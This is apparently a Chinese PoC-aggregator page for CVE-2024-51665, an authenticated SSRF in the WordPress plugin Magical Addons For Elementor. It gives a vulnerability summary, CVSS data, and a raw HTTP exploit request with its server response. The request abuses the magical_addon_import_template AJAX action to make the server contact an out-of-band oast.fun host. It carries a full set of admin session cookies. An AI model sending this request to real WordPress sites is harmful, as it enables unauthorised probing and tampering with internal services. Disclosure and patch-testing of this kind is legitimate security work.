POC详情: bdf12432250d01cca311817da215eab9387b7de9

来源
关联漏洞
标题: WordPress plugin Magical Addons For Elementor 代码问题漏洞 (CVE-2024-51665)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Magical Addons For Elementor 1.2.1版本及之前版本存在代码问题漏洞。攻击者利用该漏洞执行服务器端请求伪造攻击。
描述
Magical Addons For Elementor <= 1.2.1 - Authenticated (Subscriber+) Server-Side Request Forgery
介绍
# CVE-2024-51665
Magical Addons For Elementor &lt;= 1.2.1 - Authenticated (Subscriber+) Server-Side Request Forgery

# Description:
The Magical Addons For Elementor ( Header Footer Builder, Free Elementor Widgets, Elementor Templates Library ) plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.

```
CVE: CVE-2024-51665
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
CVSS Score: 6.4
Slugs: magical-addons-for-elementor
```

POC
---

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1731408607%7CmiG195bwGw9U0MCeugmpqKixxK2Y5xcpwWpLTeKrE5N%7C4da380106f854d896c9d58cf609bf00c508c045357a73fbc0c5ea3e2d4925573; _delighted_web={%22FutSOUgy5edCcTk9%22:{%22_delighted_fst%22:{%22t%22:%221694595337803%22}}}; mailpoet_page_view=%7B%22timestamp%22%3A1727811617%7D; wordpress_admin_logged_in=1; LUMISESESSID=TE3CYBG1VFQEDZU5QXW7; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; tk_ai=woo%3A4etnnSH4LBZewXIFkJECnLd0; PHPSESSID=786ef110eb080f5686818c346edde8d3; wp-settings-time-4=1731070503; sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-08%2017%3A21%3A02%7C%7C%7Cep%3Dhttp%3A%2F%2Fkubernetes.docker.internal%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-08%2017%3A21%3A02%7C%7C%7Cep%3Dhttp%3A%2F%2Fkubernetes.docker.internal%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D4%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010.15%3B%20rv%3A132.0%29%20Gecko%2F20100101%20Firefox%2F132.0; woocommerce_items_in_cart=1; woocommerce_cart_hash=6d1d20e1fd5e4f4f3846eea4a6c448f3; wp_woocommerce_session_e2df32a6c3e7076dd7dc7d3f3fec39aa=1%7C%7C1731322046%7C%7C1731318446%7C%7C1878869e68ff1672506462f9d2b69bb9; wp_masteriyo_session_e2df32a6c3e7076dd7dc7d3f3fec39aa=1%7C%7C1731344010%7C%7C1731340410%7C%7C438a61e5a677a01984451f5aca4a5945; wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1731408607%7CmiG195bwGw9U0MCeugmpqKixxK2Y5xcpwWpLTeKrE5N%7C5a938f0f09db5c9aff66b41764f880910ac3f0232da95a6b9436a266b3e84e27; wp-settings-1=m02pzb9ihm%3Dundefined%26libraryContent%3Dbrowse; wp-settings-time-1=1731235808
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

action=magical_addon_import_template&id=1&parent_site=suvjjaixwwfhtvhfbtjikrp9sk6je4edb.oast.fun/
```

```
HTTP/1.1 200 OK
Date: Sun, 10 Nov 2024 12:00:47 GMT
Server: Apache/2.4.57 (Debian)
X-Powered-By: PHP/8.2.13
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Referrer-Policy: strict-origin-when-cross-origin
X-Frame-Options: SAMEORIGIN
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

null
```
文件快照

[4.0K] /data/pocs/bdf12432250d01cca311817da215eab9387b7de9 └── [3.8K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。